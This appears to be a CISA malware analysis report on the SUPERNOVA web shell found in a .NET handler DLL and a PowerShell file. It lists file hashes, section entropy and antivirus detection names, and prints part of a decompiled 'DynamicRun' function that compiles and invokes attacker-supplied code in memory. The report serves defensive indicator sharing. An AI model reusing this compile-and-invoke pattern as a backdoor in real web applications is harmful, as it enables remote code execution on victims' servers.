MAR-10319053.r1.v2
Malware Characterization
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
cisa
2021-11-16T14:44:50-05:00
BMachine
134
7.1.0
File: 1.ps1
Size: 10609 bytes
Type: ASCII text, with very long lines
MD5: 4423a4353a0e7972090413deb40d56ad
SHA1: 8004d78e6934efb4dea8baf48a589c2c1ed10bf3
SHA256: 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515
SHA512: 5d2dee3c8e4c6a4fa1d84e434ab0b864245fae51360e03ed7338c2b40d7c1d61aad755f8c54615197100dd3b8bfd00d33b256178123002b7c07779c257fa13db
SSDEEP: 192:9x2OrPgH8XWECNsW4IX4SLY0tqIeZ9StIGca/HjKxnlyImIwN:Fr28XWECNsbIX4SLY0BeZ9StI9OHjMlw
Entropy: 4.457683
Contains
) Enumerable.Select((IEnumerable) compilerResults.Errors.Cast(), (Func) (LogoImageHandler.<>c.<>9__3_0 ?? (LogoImageHandler.<>c.<>9__3_0 = new Func((object) LogoImageHandler.<>c.<>9, __methodptr(<DynamicRun>b__3_0))))));
    // compilation failed: log a marker and hand the compiler errors back to the caller
    Console.WriteLine("error");
    return compilerResults.Errors.ToString();
}
// compilation succeeded: instantiate the requested class from the in-memory assembly
// and invoke the requested method on it by name via reflection, returning its string result
object instance = compilerResults.CompiledAssembly.CreateInstance(clazz);
return (string) instance.GetType().GetMethod(method).Invoke(instance, (object[]) args);
}
--End DynamicRun Function--
File: App_Web_logoimagehandler.ashx.b6031896.dll
Size: 7680 bytes
Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: 56ceb6d0011d87b6e4d7023d7ef85676
SHA1: 75af292f34789a1c782ea36c7127bf6106f595e8
SHA256: c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
SHA512: f7eac6ab99fe45ca46417cdca36ba27560d5f8a2f37f378ba97636662595d55fa34f749716971aa96a862e37e0199eb6cb905636e6ab0123cfa089adba450629
SSDEEP: 192:8/SqRzbt0GBDawA5uT8wSlyDDGTBNFkQ:8/SyHKGBDax5uThDD6BNr
Microsoft Visual C# / Basic .NET
4.62245
4
2020-03-24 05:16:10-04:00
512
MD5
21556dbcb227ba907e33b0847b427ef4
2.597488
None
0.0.0.0
App_Web_logoimagehandler.ashx.b6031896.dll
App_Web_logoimagehandler.ashx.b6031896.dll
None
0.0.0.0
Section  Size  Entropy   MD5
.text    5632  5.285309  9002a963c87901397a986c3333d09627
.rsrc    1024  2.583328  78888431b10a2bf283387437a750bca3
.reloc   512   0.081539  45ded0a8dacde15cb402adfe11b0fe3e
Contained_Within
Characterized_By
Figure 1
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5: 4423a4353a0e7972090413deb40d56ad
SHA1: 8004d78e6934efb4dea8baf48a589c2c1ed10bf3
SHA256: 290951fcc76b497f13dcb756883be3377cd3a4692e51350c92cac157fc87e515
NCCIC
2021-11-17T14:31:17+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5: 56ceb6d0011d87b6e4d7023d7ef85676
SHA1: 75af292f34789a1c782ea36c7127bf6106f595e8
SHA256: c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71
NCCIC
2021-11-17T14:31:17+00:00
MAEC Characterization of 4423a4353a0e7972090413deb40d56ad
Microsoft Security Essentials: Trojan:MSIL/Solorigate.G!dha
trojan
MAEC Characterization of 56ceb6d0011d87b6e4d7023d7ef85676
Antiy: Trojan/MSIL.Agent
McAfee: Trojan-sunburst
K7: Trojan ( 00574a531 )
Systweak: trojan-backdoor.sunburst-r
Cyren: W32/Supernova.GYFL-6114
Symantec: Backdoor.SuperNova
Zillya!: Trojan.SunBurst.Win32.3
Clamav: Win.Countermeasure.SUPERNOVA-9808999-1
BitDefender: Trojan.Supernova.A
Microsoft Security Essentials: Trojan:MSIL/Solorigate.G!dha
Sophos: Mal/Sunburst-B
Comodo: Backdoor
TrendMicro House Call: Trojan.59AF4B5F
TrendMicro: Trojan.59AF4B5F
Emsisoft: Trojan.Supernova.A (B)
Avira: TR/Sunburst.BR
VirusBlokAda: TScope.Trojan.MSIL
Ahnlab: Backdoor/Win32.SunBurst
ESET: a variant of MSIL/SunBurst.A trojan
NANOAV: Trojan.Win32.Sunburst.iduxaq
Lavasoft: Trojan.Supernova.A
Quick Heal: Backdoor.Sunburst
Ikarus: Backdoor.Sunburst
backdoor
10319053.r1.v2
Malicious Code
Malicious Artifact Detected